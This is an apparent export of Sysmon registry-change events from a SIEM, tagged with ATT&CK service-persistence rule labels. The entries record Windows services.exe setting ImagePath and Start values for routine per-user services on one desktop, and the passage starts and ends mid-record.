10:15:44.217"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DeviceAssociationBrokerSvc_3ddcb\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.217 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_3ddcb\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow -p""" +"Apr 26, 2020 @ 10:15:48.502",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.269091500Z"",""eventRecordID"":""827"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.217\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DeviceAssociationBrokerSvc_3ddcb\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.217"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DeviceAssociationBrokerSvc_3ddcb\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.217 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_3ddcb\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:15:48.488",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.262748800Z"",""eventRecordID"":""826"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.217\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CredentialEnrollmentManagerUserSvc_3ddcb\\ImagePath\r\nDetails: C:\\Windows\\system32\\CredentialEnrollmentManager.exe\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.217"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CredentialEnrollmentManagerUserSvc_3ddcb\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\CredentialEnrollmentManager.exe""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.217 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_3ddcb\ImagePath +Details: C:\Windows\system32\CredentialEnrollmentManager.exe""" +"Apr 26, 2020 @ 10:15:48.448",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.259176000Z"",""eventRecordID"":""825"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.217\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CredentialEnrollmentManagerUserSvc_3ddcb\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.217"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CredentialEnrollmentManagerUserSvc_3ddcb\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.217 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_3ddcb\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:15:48.417",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.255564900Z"",""eventRecordID"":""824"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.217\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\ConsentUxUserSvc_3ddcb\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.217"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\ConsentUxUserSvc_3ddcb\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.217 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\ConsentUxUserSvc_3ddcb\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 26, 2020 @ 10:15:48.401",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.255194500Z"",""eventRecordID"":""823"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.217\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\ConsentUxUserSvc_3ddcb\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.217"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\ConsentUxUserSvc_3ddcb\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.217 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\ConsentUxUserSvc_3ddcb\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:15:48.357",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.253478000Z"",""eventRecordID"":""822"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.217\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CDPUserSvc_3ddcb\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.217"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CDPUserSvc_3ddcb\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.217 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CDPUserSvc_3ddcb\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 26, 2020 @ 10:15:48.332",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.253039000Z"",""eventRecordID"":""821"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.217\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CDPUserSvc_3ddcb\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.217"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CDPUserSvc_3ddcb\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.217 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CDPUserSvc_3ddcb\Start +Details: DWORD (0x00000002)""" +"Apr 26, 2020 @ 10:15:48.321",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.251049100Z"",""eventRecordID"":""820"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.217\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\cbdhsvc_3ddcb\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k ClipboardSvcGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.217"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\cbdhsvc_3ddcb\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k ClipboardSvcGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.217 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\cbdhsvc_3ddcb\ImagePath +Details: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p""" +"Apr 26, 2020 @ 10:15:48.293",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.250328100Z"",""eventRecordID"":""819"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.217\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\cbdhsvc_3ddcb\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.217"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\cbdhsvc_3ddcb\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.217 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\cbdhsvc_3ddcb\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:15:48.266",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.249076600Z"",""eventRecordID"":""818"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.217\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CaptureService_3ddcb\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k LocalService -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.217"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CaptureService_3ddcb\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k LocalService -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.217 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CaptureService_3ddcb\ImagePath +Details: C:\Windows\system32\svchost.exe -k LocalService -p""" +"Apr 26, 2020 @ 10:15:48.151",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.248682500Z"",""eventRecordID"":""817"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.217\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CaptureService_3ddcb\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.217"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CaptureService_3ddcb\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.217 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CaptureService_3ddcb\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:15:48.128",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.224697800Z"",""eventRecordID"":""816"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.217\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BluetoothUserService_3ddcb\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k BthAppGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.217"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BluetoothUserService_3ddcb\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k BthAppGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.217 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BluetoothUserService_3ddcb\ImagePath +Details: C:\Windows\system32\svchost.exe -k BthAppGroup -p""" +"Apr 26, 2020 @ 10:15:48.123",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.224426600Z"",""eventRecordID"":""815"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.217\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BluetoothUserService_3ddcb\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.217"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BluetoothUserService_3ddcb\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.217 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BluetoothUserService_3ddcb\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:15:48.096",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.223453900Z"",""eventRecordID"":""814"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.202\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BcastDVRUserService_3ddcb\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k BcastDVRUserService\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.202"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BcastDVRUserService_3ddcb\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k BcastDVRUserService""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.202 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BcastDVRUserService_3ddcb\ImagePath +Details: C:\Windows\system32\svchost.exe -k BcastDVRUserService""" +"Apr 26, 2020 @ 10:15:48.047",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.223144600Z"",""eventRecordID"":""813"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.202\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BcastDVRUserService_3ddcb\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.202"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BcastDVRUserService_3ddcb\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.202 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BcastDVRUserService_3ddcb\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:15:48.020",9,"ATT&CK T1058:Registry edit for new 
